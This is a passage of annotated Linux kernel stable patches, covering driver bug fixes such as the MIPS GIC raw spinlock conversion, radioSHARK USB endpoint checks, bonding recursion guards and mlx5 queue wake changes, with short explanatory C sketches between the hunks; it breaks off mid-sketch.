++	if (WARN_ON(len < 0 || len < CORESIGHT_BARRIER_PKT_SIZE))
+ 		return -EINVAL;
+ 	coresight_insert_barrier_packet(bufp);
+ 	return offset + CORESIGHT_BARRIER_PKT_SIZE;
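
The extra len < 0 test matters because tmc_etr_buf_get_data() can return a negative error, and if CORESIGHT_BARRIER_PKT_SIZE is an unsigned expression (e.g. derived from a sizeof), the old comparison silently promoted the negative len to a huge unsigned value and let it pass the check. A self-contained illustration of that pitfall, assuming an unsigned size constant:

#include <stdio.h>

int main(void)
{
	long len = -5;			/* e.g. an error code */
	unsigned long pkt_size = 8;	/* unsigned, like a sizeof */

	if (len < pkt_size)		/* len promoted to unsigned: false! */
		puts("never printed");
	if (len < 0 || (unsigned long)len < pkt_size)
		puts("error caught");	/* printed */
	return 0;
}
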
+diff --git a/drivers/irqchip/irq-mips-gic.c b/drivers/irqchip/irq-mips-gic.c
+index 1ba0f1555c805..3a33aefec8a48 100644
+--- a/drivers/irqchip/irq-mips-gic.c
++++ b/drivers/irqchip/irq-mips-gic.c
+@@ -50,7 +50,7 @@ void __iomem *mips_gic_base;
+ 
+ static DEFINE_PER_CPU_READ_MOSTLY(unsigned long[GIC_MAX_LONGS], pcpu_masks);
+ 
+-static DEFINE_SPINLOCK(gic_lock);
++static DEFINE_RAW_SPINLOCK(gic_lock);
+ static struct irq_domain *gic_irq_domain;
+ static int gic_shared_intrs;
+ static unsigned int gic_cpu_pin;
+@@ -211,7 +211,7 @@ static int gic_set_type(struct irq_data *d, unsigned int type)
+ 
+ 	irq = GIC_HWIRQ_TO_SHARED(d->hwirq);
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	switch (type & IRQ_TYPE_SENSE_MASK) {
+ 	case IRQ_TYPE_EDGE_FALLING:
+ 		pol = GIC_POL_FALLING_EDGE;
+@@ -251,7 +251,7 @@ static int gic_set_type(struct irq_data *d, unsigned int type)
+ 	else
+ 		irq_set_chip_handler_name_locked(d, &gic_level_irq_controller,
+ 						 handle_level_irq, NULL);
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -269,7 +269,7 @@ static int gic_set_affinity(struct irq_data *d, const struct cpumask *cpumask,
+ 		return -EINVAL;
+ 
+ 	/* Assumption : cpumask refers to a single CPU */
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 
+ 	/* Re-route this IRQ */
+ 	write_gic_map_vp(irq, BIT(mips_cm_vp_id(cpu)));
+@@ -280,7 +280,7 @@ static int gic_set_affinity(struct irq_data *d, const struct cpumask *cpumask,
+ 		set_bit(irq, per_cpu_ptr(pcpu_masks, cpu));
+ 
+ 	irq_data_update_effective_affinity(d, cpumask_of(cpu));
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ 
+ 	return IRQ_SET_MASK_OK;
+ }
+@@ -358,12 +358,12 @@ static void gic_mask_local_irq_all_vpes(struct irq_data *d)
+ 	cd = irq_data_get_irq_chip_data(d);
+ 	cd->mask = false;
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	for_each_online_cpu(cpu) {
+ 		write_gic_vl_other(mips_cm_vp_id(cpu));
+ 		write_gic_vo_rmask(BIT(intr));
+ 	}
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ }
+ 
+ static void gic_unmask_local_irq_all_vpes(struct irq_data *d)
+@@ -376,12 +376,12 @@ static void gic_unmask_local_irq_all_vpes(struct irq_data *d)
+ 	cd = irq_data_get_irq_chip_data(d);
+ 	cd->mask = true;
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	for_each_online_cpu(cpu) {
+ 		write_gic_vl_other(mips_cm_vp_id(cpu));
+ 		write_gic_vo_smask(BIT(intr));
+ 	}
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ }
+ 
+ static void gic_all_vpes_irq_cpu_online(void)
+@@ -394,19 +394,21 @@ static void gic_all_vpes_irq_cpu_online(void)
+ 	unsigned long flags;
+ 	int i;
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(local_intrs); i++) {
+ 		unsigned int intr = local_intrs[i];
+ 		struct gic_all_vpes_chip_data *cd;
+ 
++		if (!gic_local_irq_is_routable(intr))
++			continue;
+ 		cd = &gic_all_vpes_chip_data[intr];
+ 		write_gic_vl_map(mips_gic_vx_map_reg(intr), cd->map);
+ 		if (cd->mask)
+ 			write_gic_vl_smask(BIT(intr));
+ 	}
+ 
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ }
+ 
+ static struct irq_chip gic_all_vpes_local_irq_controller = {
+@@ -436,11 +438,11 @@ static int gic_shared_irq_domain_map(struct irq_domain *d, unsigned int virq,
+ 
+ 	data = irq_get_irq_data(virq);
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	write_gic_map_pin(intr, GIC_MAP_PIN_MAP_TO_PIN | gic_cpu_pin);
+ 	write_gic_map_vp(intr, BIT(mips_cm_vp_id(cpu)));
+ 	irq_data_update_effective_affinity(data, cpumask_of(cpu));
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -535,12 +537,12 @@ static int gic_irq_domain_map(struct irq_domain *d, unsigned int virq,
+ 	if (!gic_local_irq_is_routable(intr))
+ 		return -EPERM;
+ 
+-	spin_lock_irqsave(&gic_lock, flags);
++	raw_spin_lock_irqsave(&gic_lock, flags);
+ 	for_each_online_cpu(cpu) {
+ 		write_gic_vl_other(mips_cm_vp_id(cpu));
+ 		write_gic_vo_map(mips_gic_vx_map_reg(intr), map);
+ 	}
+-	spin_unlock_irqrestore(&gic_lock, flags);
++	raw_spin_unlock_irqrestore(&gic_lock, flags);
+ 
+ 	return 0;
+ }
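
Converting gic_lock to raw_spinlock_t matters on PREEMPT_RT, where an ordinary spinlock_t becomes a sleeping rtmutex: these paths run from irqchip callbacks and CPU-hotplug/hard-IRQ context, where sleeping is not allowed. The general rule, sketched with hypothetical names:

static DEFINE_RAW_SPINLOCK(example_hw_lock);	/* never sleeps, even on RT */

static void example_irqchip_op(unsigned int hwirq)
{
	unsigned long flags;

	raw_spin_lock_irqsave(&example_hw_lock, flags);
	/* ... short, bounded hardware register programming ... */
	raw_spin_unlock_irqrestore(&example_hw_lock, flags);
}
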
+diff --git a/drivers/media/radio/radio-shark.c b/drivers/media/radio/radio-shark.c
+index 8230da828d0ee..127a3be0e0f07 100644
+--- a/drivers/media/radio/radio-shark.c
++++ b/drivers/media/radio/radio-shark.c
+@@ -316,6 +316,16 @@ static int usb_shark_probe(struct usb_interface *intf,
+ {
+ 	struct shark_device *shark;
+ 	int retval = -ENOMEM;
++	static const u8 ep_addresses[] = {
++		SHARK_IN_EP | USB_DIR_IN,
++		SHARK_OUT_EP | USB_DIR_OUT,
++		0};
++
++	/* Are the expected endpoints present? */
++	if (!usb_check_int_endpoints(intf, ep_addresses)) {
++		dev_err(&intf->dev, "Invalid radioSHARK device\n");
++		return -EINVAL;
++	}
+ 
+ 	shark = kzalloc(sizeof(struct shark_device), GFP_KERNEL);
+ 	if (!shark)
+diff --git a/drivers/media/radio/radio-shark2.c b/drivers/media/radio/radio-shark2.c
+index d150f12382c60..f1c5c0a6a335c 100644
+--- a/drivers/media/radio/radio-shark2.c
++++ b/drivers/media/radio/radio-shark2.c
+@@ -282,6 +282,16 @@ static int usb_shark_probe(struct usb_interface *intf,
+ {
+ 	struct shark_device *shark;
+ 	int retval = -ENOMEM;
++	static const u8 ep_addresses[] = {
++		SHARK_IN_EP | USB_DIR_IN,
++		SHARK_OUT_EP | USB_DIR_OUT,
++		0};
++
++	/* Are the expected endpoints present? */
++	if (!usb_check_int_endpoints(intf, ep_addresses)) {
++		dev_err(&intf->dev, "Invalid radioSHARK2 device\n");
++		return -EINVAL;
++	}
+ 
+ 	shark = kzalloc(sizeof(struct shark_device), GFP_KERNEL);
+ 	if (!shark)
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index db6d8a0999100..498333b769fdb 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -266,6 +266,7 @@ static ssize_t power_ro_lock_store(struct device *dev,
+ 		goto out_put;
+ 	}
+ 	req_to_mmc_queue_req(req)->drv_op = MMC_DRV_OP_BOOT_WP;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	blk_execute_rq(req, false);
+ 	ret = req_to_mmc_queue_req(req)->drv_op_result;
+ 	blk_mq_free_request(req);
+@@ -657,6 +658,7 @@ static int mmc_blk_ioctl_cmd(struct mmc_blk_data *md,
+ 	idatas[0] = idata;
+ 	req_to_mmc_queue_req(req)->drv_op =
+ 		rpmb ? MMC_DRV_OP_IOCTL_RPMB : MMC_DRV_OP_IOCTL;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	req_to_mmc_queue_req(req)->drv_op_data = idatas;
+ 	req_to_mmc_queue_req(req)->ioc_count = 1;
+ 	blk_execute_rq(req, false);
+@@ -728,6 +730,7 @@ static int mmc_blk_ioctl_multi_cmd(struct mmc_blk_data *md,
+ 	}
+ 	req_to_mmc_queue_req(req)->drv_op =
+ 		rpmb ? MMC_DRV_OP_IOCTL_RPMB : MMC_DRV_OP_IOCTL;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	req_to_mmc_queue_req(req)->drv_op_data = idata;
+ 	req_to_mmc_queue_req(req)->ioc_count = n;
+ 	blk_execute_rq(req, false);
+@@ -2812,6 +2815,7 @@ static int mmc_dbg_card_status_get(void *data, u64 *val)
+ 	if (IS_ERR(req))
+ 		return PTR_ERR(req);
+ 	req_to_mmc_queue_req(req)->drv_op = MMC_DRV_OP_GET_CARD_STATUS;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	blk_execute_rq(req, false);
+ 	ret = req_to_mmc_queue_req(req)->drv_op_result;
+ 	if (ret >= 0) {
+@@ -2850,6 +2854,7 @@ static int mmc_ext_csd_open(struct inode *inode, struct file *filp)
+ 		goto out_free;
+ 	}
+ 	req_to_mmc_queue_req(req)->drv_op = MMC_DRV_OP_GET_EXT_CSD;
++	req_to_mmc_queue_req(req)->drv_op_result = -EIO;
+ 	req_to_mmc_queue_req(req)->drv_op_data = &ext_csd;
+ 	blk_execute_rq(req, false);
+ 	err = req_to_mmc_queue_req(req)->drv_op_result;
+diff --git a/drivers/mmc/host/sdhci-esdhc-imx.c b/drivers/mmc/host/sdhci-esdhc-imx.c
+index 8c62c3fba75e8..b63cf1f9e8fb9 100644
+--- a/drivers/mmc/host/sdhci-esdhc-imx.c
++++ b/drivers/mmc/host/sdhci-esdhc-imx.c
+@@ -1585,6 +1585,10 @@ sdhci_esdhc_imx_probe_dt(struct platform_device *pdev,
+ 	if (ret)
+ 		return ret;
+ 
++	/* HS400/HS400ES require 8 bit bus */
++	if (!(host->mmc->caps & MMC_CAP_8_BIT_DATA))
++		host->mmc->caps2 &= ~(MMC_CAP2_HS400 | MMC_CAP2_HS400_ES);
++
+ 	if (mmc_gpio_get_cd(host->mmc) >= 0)
+ 		host->quirks &= ~SDHCI_QUIRK_BROKEN_CARD_DETECTION;
+ 
+@@ -1669,10 +1673,6 @@ static int sdhci_esdhc_imx_probe(struct platform_device *pdev)
+ 		host->mmc_host_ops.execute_tuning = usdhc_execute_tuning;
+ 	}
+ 
+-	err = sdhci_esdhc_imx_probe_dt(pdev, host, imx_data);
+-	if (err)
+-		goto disable_ahb_clk;
+-
+ 	if (imx_data->socdata->flags & ESDHC_FLAG_MAN_TUNING)
+ 		sdhci_esdhc_ops.platform_execute_tuning =
+ 					esdhc_executing_tuning;
+@@ -1680,15 +1680,13 @@ static int sdhci_esdhc_imx_probe(struct platform_device *pdev)
+ 	if (imx_data->socdata->flags & ESDHC_FLAG_ERR004536)
+ 		host->quirks |= SDHCI_QUIRK_BROKEN_ADMA;
+ 
+-	if (host->mmc->caps & MMC_CAP_8_BIT_DATA &&
+-	    imx_data->socdata->flags & ESDHC_FLAG_HS400)
++	if (imx_data->socdata->flags & ESDHC_FLAG_HS400)
+ 		host->mmc->caps2 |= MMC_CAP2_HS400;
+ 
+ 	if (imx_data->socdata->flags & ESDHC_FLAG_BROKEN_AUTO_CMD23)
+ 		host->quirks2 |= SDHCI_QUIRK2_ACMD23_BROKEN;
+ 
+-	if (host->mmc->caps & MMC_CAP_8_BIT_DATA &&
+-	    imx_data->socdata->flags & ESDHC_FLAG_HS400_ES) {
++	if (imx_data->socdata->flags & ESDHC_FLAG_HS400_ES) {
+ 		host->mmc->caps2 |= MMC_CAP2_HS400_ES;
+ 		host->mmc_host_ops.hs400_enhanced_strobe =
+ 					esdhc_hs400_enhanced_strobe;
+@@ -1710,6 +1708,10 @@ static int sdhci_esdhc_imx_probe(struct platform_device *pdev)
+ 			goto disable_ahb_clk;
+ 	}
+ 
++	err = sdhci_esdhc_imx_probe_dt(pdev, host, imx_data);
++	if (err)
++		goto disable_ahb_clk;
++
+ 	sdhci_esdhc_imx_hwinit(host);
+ 
+ 	err = sdhci_add_host(host);
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 9f44c86a591dd..9ed80f7106515 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -3921,7 +3921,11 @@ static int bond_slave_netdev_event(unsigned long event,
+ 		unblock_netpoll_tx();
+ 		break;
+ 	case NETDEV_FEAT_CHANGE:
+-		bond_compute_features(bond);
++		if (!bond->notifier_ctx) {
++			bond->notifier_ctx = true;
++			bond_compute_features(bond);
++			bond->notifier_ctx = false;
++		}
+ 		break;
+ 	case NETDEV_RESEND_IGMP:
+ 		/* Propagate to master device */
+@@ -6284,6 +6288,8 @@ static int bond_init(struct net_device *bond_dev)
+ 	if (!bond->wq)
+ 		return -ENOMEM;
+ 
++	bond->notifier_ctx = false;
++
+ 	spin_lock_init(&bond->stats_lock);
+ 	netdev_lockdep_set_classes(bond_dev);
+ 
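
bond_compute_features() can itself update the bond device's features, which fires another NETDEV_FEAT_CHANGE that re-enters this handler; the new notifier_ctx flag breaks that recursion. Since netdev notifiers here run under RTNL, a plain bool suffices. Generic shape of the guard (names hypothetical):

static void example_feat_change(struct example_master *m)
{
	if (m->in_notifier)		/* recursing via our own feature update */
		return;

	m->in_notifier = true;
	recompute_features(m);		/* may re-trigger NETDEV_FEAT_CHANGE */
	m->in_notifier = false;
}
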
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 12175195d3968..a8ff6ee6d58e6 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5044,6 +5044,7 @@ static const struct mv88e6xxx_ops mv88e6320_ops = {
+ 	.phy_write = mv88e6xxx_g2_smi_phy_write,
+ 	.port_set_link = mv88e6xxx_port_set_link,
+ 	.port_sync_link = mv88e6xxx_port_sync_link,
++	.port_set_rgmii_delay = mv88e6320_port_set_rgmii_delay,
+ 	.port_set_speed_duplex = mv88e6185_port_set_speed_duplex,
+ 	.port_tag_remap = mv88e6095_port_tag_remap,
+ 	.port_set_frame_mode = mv88e6351_port_set_frame_mode,
+@@ -5088,6 +5089,7 @@ static const struct mv88e6xxx_ops mv88e6321_ops = {
+ 	.phy_write = mv88e6xxx_g2_smi_phy_write,
+ 	.port_set_link = mv88e6xxx_port_set_link,
+ 	.port_sync_link = mv88e6xxx_port_sync_link,
++	.port_set_rgmii_delay = mv88e6320_port_set_rgmii_delay,
+ 	.port_set_speed_duplex = mv88e6185_port_set_speed_duplex,
+ 	.port_tag_remap = mv88e6095_port_tag_remap,
+ 	.port_set_frame_mode = mv88e6351_port_set_frame_mode,
+diff --git a/drivers/net/dsa/mv88e6xxx/port.c b/drivers/net/dsa/mv88e6xxx/port.c
+index 5c4195c635b0f..f79cf716c541f 100644
+--- a/drivers/net/dsa/mv88e6xxx/port.c
++++ b/drivers/net/dsa/mv88e6xxx/port.c
+@@ -133,6 +133,15 @@ int mv88e6390_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
+ 	return mv88e6xxx_port_set_rgmii_delay(chip, port, mode);
+ }
+ 
++int mv88e6320_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
++				   phy_interface_t mode)
++{
++	if (port != 2 && port != 5 && port != 6)
++		return -EOPNOTSUPP;
++
++	return mv88e6xxx_port_set_rgmii_delay(chip, port, mode);
++}
++
+ int mv88e6xxx_port_set_link(struct mv88e6xxx_chip *chip, int port, int link)
+ {
+ 	u16 reg;
+diff --git a/drivers/net/dsa/mv88e6xxx/port.h b/drivers/net/dsa/mv88e6xxx/port.h
+index a91e22d9a6cb3..d19b6303b91f0 100644
+--- a/drivers/net/dsa/mv88e6xxx/port.h
++++ b/drivers/net/dsa/mv88e6xxx/port.h
+@@ -332,6 +332,8 @@ int mv88e6xxx_port_wait_bit(struct mv88e6xxx_chip *chip, int port, int reg,
+ 
+ int mv88e6185_port_set_pause(struct mv88e6xxx_chip *chip, int port,
+ 			     int pause);
++int mv88e6320_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
++				   phy_interface_t mode);
+ int mv88e6352_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
+ 				   phy_interface_t mode);
+ int mv88e6390_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
+diff --git a/drivers/net/ethernet/3com/3c589_cs.c b/drivers/net/ethernet/3com/3c589_cs.c
+index 82f94b1635bf8..5267e9dcd87ef 100644
+--- a/drivers/net/ethernet/3com/3c589_cs.c
++++ b/drivers/net/ethernet/3com/3c589_cs.c
+@@ -195,6 +195,7 @@ static int tc589_probe(struct pcmcia_device *link)
+ {
+ 	struct el3_private *lp;
+ 	struct net_device *dev;
++	int ret;
+ 
+ 	dev_dbg(&link->dev, "3c589_attach()\n");
+ 
+@@ -218,7 +219,15 @@ static int tc589_probe(struct pcmcia_device *link)
+ 
+ 	dev->ethtool_ops = &netdev_ethtool_ops;
+ 
+-	return tc589_config(link);
++	ret = tc589_config(link);
++	if (ret)
++		goto err_free_netdev;
++
++	return 0;
++
++err_free_netdev:
++	free_netdev(dev);
++	return ret;
+ }
+ 
+ static void tc589_detach(struct pcmcia_device *link)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index 7045fedfd73a0..7af223b0a37f5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -652,9 +652,7 @@ static void otx2_sqe_add_ext(struct otx2_nic *pfvf, struct otx2_snd_queue *sq,
+ 				htons(ext->lso_sb - skb_network_offset(skb));
+ 		} else if (skb_shinfo(skb)->gso_type & SKB_GSO_TCPV6) {
+ 			ext->lso_format = pfvf->hw.lso_tsov6_idx;
+-
+-			ipv6_hdr(skb)->payload_len =
+-				htons(ext->lso_sb - skb_network_offset(skb));
++			ipv6_hdr(skb)->payload_len = htons(tcp_hdrlen(skb));
+ 		} else if (skb_shinfo(skb)->gso_type & SKB_GSO_UDP_L4) {
+ 			__be16 l3_proto = vlan_get_protocol(skb);
+ 			struct udphdr *udph = udp_hdr(skb);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+index 723891eb86eec..b3253e263ebc8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+@@ -1894,9 +1894,10 @@ static void mlx5_cmd_err_trace(struct mlx5_core_dev *dev, u16 opcode, u16 op_mod
+ static void cmd_status_log(struct mlx5_core_dev *dev, u16 opcode, u8 status,
+ 			   u32 syndrome, int err)
+ {
++	const char *namep = mlx5_command_str(opcode);
+ 	struct mlx5_cmd_stats *stats;
+ 
+-	if (!err)
++	if (!err || !(strcmp(namep, "unknown command opcode")))
+ 		return;
+ 
+ 	stats = &dev->cmd.stats[opcode];
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+index ae75e230170b5..efd02ce4425de 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+@@ -175,6 +175,8 @@ static bool mlx5e_ptp_poll_ts_cq(struct mlx5e_cq *cq, int budget)
+ 	/* ensure cq space is freed before enabling more cqes */
+ 	wmb();
+ 
++	mlx5e_txqsq_wake(&ptpsq->txqsq);
++
+ 	return work_done == budget;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+index 2aaf8ab857b8f..72b61f66df37a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+@@ -1338,11 +1338,13 @@ static void mlx5e_invalidate_encap(struct mlx5e_priv *priv,
+ 	struct mlx5e_tc_flow *flow;
+ 
+ 	list_for_each_entry(flow, encap_flows, tmp_list) {
+-		struct mlx5_flow_attr *attr = flow->attr;
+ 		struct mlx5_esw_flow_attr *esw_attr;
++		struct mlx5_flow_attr *attr;
+ 
+ 		if (!mlx5e_is_offloaded_flow(flow))
+ 			continue;
++
++		attr = mlx5e_tc_get_encap_attr(flow);
+ 		esw_attr = attr->esw_attr;
+ 
+ 		if (flow_flag_test(flow, SLOW))
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+index 1b3a65325ece1..344245c01150b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+@@ -177,6 +177,8 @@ static inline u16 mlx5e_txqsq_get_next_pi(struct mlx5e_txqsq *sq, u16 size)
+ 	return pi;
+ }
+ 
++void mlx5e_txqsq_wake(struct mlx5e_txqsq *sq);
++
+ static inline u16 mlx5e_shampo_get_cqe_header_index(struct mlx5e_rq *rq, struct mlx5_cqe64 *cqe)
+ {
+ 	return be16_to_cpu(cqe->shampo.header_entry_index) & (rq->mpwqe.shampo->hd_per_wq - 1);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 73af062a87830..7883b625634fb 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -1578,11 +1578,9 @@ bool mlx5e_tc_is_vf_tunnel(struct net_device *out_dev, struct net_device *route_
+ int mlx5e_tc_query_route_vport(struct net_device *out_dev, struct net_device *route_dev, u16 *vport)
+ {
+ 	struct mlx5e_priv *out_priv, *route_priv;
+-	struct mlx5_devcom *devcom = NULL;
+ 	struct mlx5_core_dev *route_mdev;
+ 	struct mlx5_eswitch *esw;
+ 	u16 vhca_id;
+-	int err;
+ 
+ 	out_priv = netdev_priv(out_dev);
+ 	esw = out_priv->mdev->priv.eswitch;
+@@ -1591,6 +1589,9 @@ int mlx5e_tc_query_route_vport(struct net_device *out_dev, struct net_device *ro
+ 
+ 	vhca_id = MLX5_CAP_GEN(route_mdev, vhca_id);
+ 	if (mlx5_lag_is_active(out_priv->mdev)) {
++		struct mlx5_devcom *devcom;
++		int err;
++
+ 		/* In lag case we may get devices from different eswitch instances.
+ 		 * If we failed to get vport num, it means, mostly, that we on the wrong
+ 		 * eswitch.
+@@ -1599,16 +1600,16 @@ int mlx5e_tc_query_route_vport(struct net_device *out_dev, struct net_device *ro
+ 		if (err != -ENOENT)
+ 			return err;
+ 
++		rcu_read_lock();
+ 		devcom = out_priv->mdev->priv.devcom;
+-		esw = mlx5_devcom_get_peer_data(devcom, MLX5_DEVCOM_ESW_OFFLOADS);
+-		if (!esw)
+-			return -ENODEV;
++		esw = mlx5_devcom_get_peer_data_rcu(devcom, MLX5_DEVCOM_ESW_OFFLOADS);
++		err = esw ? mlx5_eswitch_vhca_id_to_vport(esw, vhca_id, vport) : -ENODEV;
++		rcu_read_unlock();
++
++		return err;
+ 	}
+ 
+-	err = mlx5_eswitch_vhca_id_to_vport(esw, vhca_id, vport);
+-	if (devcom)
+-		mlx5_devcom_release_peer_data(devcom, MLX5_DEVCOM_ESW_OFFLOADS);
+-	return err;
++	return mlx5_eswitch_vhca_id_to_vport(esw, vhca_id, vport);
+ }
+ 
+ int mlx5e_tc_add_flow_mod_hdr(struct mlx5e_priv *priv,
+@@ -5142,6 +5143,8 @@ int mlx5e_tc_esw_init(struct mlx5_rep_uplink_priv *uplink_priv)
+ 		goto err_register_fib_notifier;
+ 	}
+ 
++	mlx5_esw_offloads_devcom_init(esw);
++
+ 	return 0;
+ 
+ err_register_fib_notifier:
+@@ -5168,7 +5171,7 @@ void mlx5e_tc_esw_cleanup(struct mlx5_rep_uplink_priv *uplink_priv)
+ 	priv = netdev_priv(rpriv->netdev);
+ 	esw = priv->mdev->priv.eswitch;
+ 
+-	mlx5e_tc_clean_fdb_peer_flows(esw);
++	mlx5_esw_offloads_devcom_cleanup(esw);
+ 
+ 	mlx5e_tc_tun_cleanup(uplink_priv->encap);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
+index f7897ddb29c52..a6d7e2cfcd0e1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
+@@ -777,6 +777,17 @@ static void mlx5e_tx_wi_consume_fifo_skbs(struct mlx5e_txqsq *sq, struct mlx5e_t
+ 	}
+ }
+ 
++void mlx5e_txqsq_wake(struct mlx5e_txqsq *sq)
++{
++	if (netif_tx_queue_stopped(sq->txq) &&
++	    mlx5e_wqc_has_room_for(&sq->wq, sq->cc, sq->pc, sq->stop_room) &&
++	    mlx5e_ptpsq_fifo_has_room(sq) &&
++	    !test_bit(MLX5E_SQ_STATE_RECOVERING, &sq->state)) {
++		netif_tx_wake_queue(sq->txq);
++		sq->stats->wake++;
++	}
++}
++
+ bool mlx5e_poll_tx_cq(struct mlx5e_cq *cq, int napi_budget)
+ {
+ 	struct mlx5e_sq_stats *stats;
+@@ -876,13 +887,7 @@ bool mlx5e_poll_tx_cq(struct mlx5e_cq *cq, int napi_budget)
+ 
+ 	netdev_tx_completed_queue(sq->txq, npkts, nbytes);
+ 
+-	if (netif_tx_queue_stopped(sq->txq) &&
+-	    mlx5e_wqc_has_room_for(&sq->wq, sq->cc, sq->pc, sq->stop_room) &&
+-	    mlx5e_ptpsq_fifo_has_room(sq) &&
+-	    !test_bit(MLX5E_SQ_STATE_RECOVERING, &sq->state)) {
+-		netif_tx_wake_queue(sq->txq);
+-		stats->wake++;
+-	}
++	mlx5e_txqsq_wake(sq);
+ 
+ 	return (i == MLX5E_TX_CQ_POLL_BUDGET);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c
+index 9a458a5d98539..44547b22a536f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c
+@@ -161,20 +161,22 @@ int mlx5e_napi_poll(struct napi_struct *napi, int budget)
+ 		}
+ 	}
+ 
++	/* budget=0 means we may be in IRQ context, do as little as possible */
++	if (unlikely(!budget))
++		goto out;
++
+ 	busy |= mlx5e_poll_xdpsq_cq(&c->xdpsq.cq);
+ 
+ 	if (c->xdp)
+ 		busy |= mlx5e_poll_xdpsq_cq(&c->rq_xdpsq.cq);
+ 
+-	if (likely(budget)) { /* budget=0 means: don't poll rx rings */
+-		if (xsk_open)
+-			work_done = mlx5e_poll_rx_cq(&xskrq->cq, budget);
++	if (xsk_open)
++		work_done = mlx5e_poll_rx_cq(&xskrq->cq, budget);
+ 
+-		if (likely(budget - work_done))
+-			work_done += mlx5e_poll_rx_cq(&rq->cq, budget - work_done);
++	if (likely(budget - work_done))
++		work_done += mlx5e_poll_rx_cq(&rq->cq, budget - work_done);
+ 
+-		busy |= work_done == budget;
+-	}
++	busy |= work_done == budget;
+ 
+ 	mlx5e_poll_ico_cq(&c->icosq.cq);
+ 	if (mlx5e_poll_ico_cq(&c->async_icosq.cq))
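
The en_txrx.c hunk above hoists the budget check to the top of the poll loop: per the new comment, a zero budget means the poll may be running in IRQ context (netpoll), so only TX-side completion work is done before bailing out, and even the XDP queues are skipped. A standalone sketch of that control flow; the function name and the stand-in "work" are illustrative, not the driver's code:

#include <stdio.h>

/* Shape of the fixed poll loop: TX completions are always reaped, but
 * with budget == 0 (netpoll, possibly IRQ context) everything else --
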